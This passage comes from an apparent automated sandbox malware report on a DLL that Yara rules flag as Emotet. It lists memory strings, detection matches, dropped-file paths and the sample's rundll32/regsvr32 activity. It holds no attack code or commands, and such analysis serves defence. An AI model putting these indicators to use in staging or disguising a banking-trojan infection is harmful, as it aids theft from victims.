"LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 0000001B.00000003.414140821.000001BC5679F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.414114890.000001BC5678E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

Source: svchost.exe, 0000001B.00000002.429773370.000001BC56700000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001B.00000002.429490850.000001BC560EA000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.23.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000017.00000003.396902729.0000000005B92000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000003.396161978.0000000005B8F000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000003.396717468.0000000005B92000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c994095b652b9
Source: svchost.exe, 0000001B.00000003.410355876.000001BC5677A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.409785448.000001BC56791000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: Amcache.hve.18.dr	String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 0000000A.00000002.310262590.000002C758813000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000002.00000002.679804350.000001EEFC84F000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000002.00000002.679804350.000001EEFC84F000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000002.00000002.679804350.000001EEFC84F000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000002.00000002.679804350.000001EEFC84F000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.comr
Source: svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000002.00000002.679804350.000001EEFC84F000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000002.00000002.679804350.000001EEFC84F000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000003.309539722.000002C758849000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.310602064.000002C75883D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.309482803.000002C758867000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310779768.000002C758869000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000003.309494671.000002C75884D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310690980.000002C758852000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.310602064.000002C75883D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000A.00000002.310656304.000002C758842000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309560133.000002C758840000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309578524.000002C758841000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000A.00000002.310656304.000002C758842000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309560133.000002C758840000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309578524.000002C758841000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000002.310723606.000002C75885C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309560133.000002C758840000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000001B.00000003.410355876.000001BC5677A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.409785448.000001BC56791000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000A.00000003.309539722.000002C758849000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000002.310723606.000002C75885C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000002.310723606.000002C75885C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000002.310690980.000002C758852000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.310602064.000002C75883D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.287584222.000002C758831000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.310602064.000002C75883D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.310602064.000002C75883D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310262590.000002C758813000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000003.309573636.000002C758845000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309560133.000002C758840000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000003.309573636.000002C758845000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309560133.000002C758840000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000003.287584222.000002C758831000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000A.00000002.310557127.000002C75883A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.287584222.000002C758831000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000A.00000003.309494671.000002C75884D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310690980.000002C758852000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 0000001B.00000003.410355876.000001BC5677A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.409785448.000001BC56791000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001B.00000003.410355876.000001BC5677A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.409785448.000001BC56791000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001B.00000003.410707163.000001BC56788000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.410814184.000001BC56C19000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.410832016.000001BC56C02000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_10001280 recvfrom,

5_2_10001280

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10027958 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		5_2_10027958
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10027958 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		6_2_10027958

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 8.2.rundll32.exe.4dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.32f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5610000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.54e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.2b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.32f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.4940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.54b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.4940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5610000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.34c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.53b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.2b30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.54b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5640000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b30000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5380000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.loaddll32.exe.2b30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.4990000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4dd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.336582284.00000000054B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336161253.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.296629194.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336665007.0000000005610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336717142.0000000005641000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.680318843.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336600440.00000000054E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.296654820.0000000002B31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336482614.0000000005380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.321734731.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336517253.00000000053B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.336197242.0000000004E01000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.290395049.0000000004991000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.680592852.00000000034C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.339368070.0000000004971000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.339330671.0000000004940000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.299013072.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.299132771.0000000002B31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.290320378.0000000004960000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Source: nV5Wu77N8J.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6788 -ip 6788

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Oxcjjbulglczzu\tjxbcbc.cmd:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Oxcjjbulglczzu\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4EFDD	1_2_02B4EFDD
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B546BD	1_2_02B546BD
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B40EBC	1_2_02B40EBC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3C6B8	1_2_02B3C6B8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B40ABA	1_2_02B40ABA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4A2A5	1_2_02B4A2A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B31CA1	1_2_02B31CA1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3BAA9	1_2_02B3BAA9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B43EAA	1_2_02B43EAA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B536AA	1_2_02B536AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4BEFD	1_2_02B4BEFD
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4E4E5	1_2_02B4E4E5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3F0E9	1_2_02B3F0E9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B500EF	1_2_02B500EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B53EE9	1_2_02B53EE9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4CAD5	1_2_02B4CAD5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4CCD9	1_2_02B4CCD9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4D8DB	1_2_02B4D8DB
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B380C0	1_2_02B380C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B33431	1_2_02B33431
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B38636	1_2_02B38636
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3B820	1_2_02B3B820
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B48806	1_2_02B48806
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B49A01	1_2_02B49A01
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B47A0F	1_2_02B47A0F
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B52009	1_2_02B52009
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4A474	1_2_02B4A474
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3A871	1_2_02B3A871
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4DC71	1_2_02B4DC71
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3DE74	1_2_02B3DE74
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B37E79	1_2_02B37E79
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B37078	1_2_02B37078
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4567B	1_2_02B4567B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B50A64	1_2_02B50A64
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B44A66	1_2_02B44A66
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B53263	1_2_02B53263
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4B257	1_2_02B4B257
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B42E5D	1_2_02B42E5D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B44244	1_2_02B44244
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B37442	1_2_02B37442
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3E640	1_2_02B3E640
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4F840	1_2_02B4F840
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3A445	1_2_02B3A445
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4D1BC	1_2_02B4D1BC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B517BD	1_2_02B517BD
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B357B8	1_2_02B357B8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3BFBE	1_2_02B3BFBE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B377A3	1_2_02B377A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B48FAE	1_2_02B48FAE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B507AA	1_2_02B507AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B32194	1_2_02B32194
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B43D85	1_2_02B43D85
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B40F86	1_2_02B40F86
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B46187	1_2_02B46187
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3FB8E	1_2_02B3FB8E
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3238C	1_2_02B3238C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B49DF5	1_2_02B49DF5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B485FF	1_2_02B485FF
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4E1F8	1_2_02B4E1F8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B355FF	1_2_02B355FF
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B34BFC	1_2_02B34BFC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B467E6	1_2_02B467E6
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4C5D5	1_2_02B4C5D5
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3C5D8	1_2_02B3C5D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3E7DE	1_2_02B3E7DE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B45333	1_2_02B45333
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B48D3D	1_2_02B48D3D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B31F38	1_2_02B31F38
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B45515	1_2_02B45515
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3670B	1_2_02B3670B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B52B09	1_2_02B52B09
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4AD08	1_2_02B4AD08
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3EF0C	1_2_02B3EF0C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B44F74	1_2_02B44F74
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B49774	1_2_02B49774
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B36B7A	1_2_02B36B7A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B45779	1_2_02B45779
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4017B	1_2_02B4017B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3F369	1_2_02B3F369
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4E955	1_2_02B4E955
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B52D53	1_2_02B52D53
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4FF58	1_2_02B4FF58
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B47D5B	1_2_02B47D5B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B42142	1_2_02B42142
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B4654A	1_2_02B4654A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B3D14C	1_2_02B3D14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100291F6	5_2_100291F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1002F378	5_2_1002F378
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100403D7	5_2_100403D7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1004250B	5_2_1004250B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10041557	5_2_10041557
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100395A1	5_2_100395A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1002F784	5_2_1002F784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1004091B	5_2_1004091B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1002EACF	5_2_1002EACF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1002FBA4	5_2_1002FBA4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10035D96	5_2_10035D96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100291F6	6_2_100291F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1002F378	6_2_1002F378
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100403D7	6_2_100403D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1004250B	6_2_1004250B
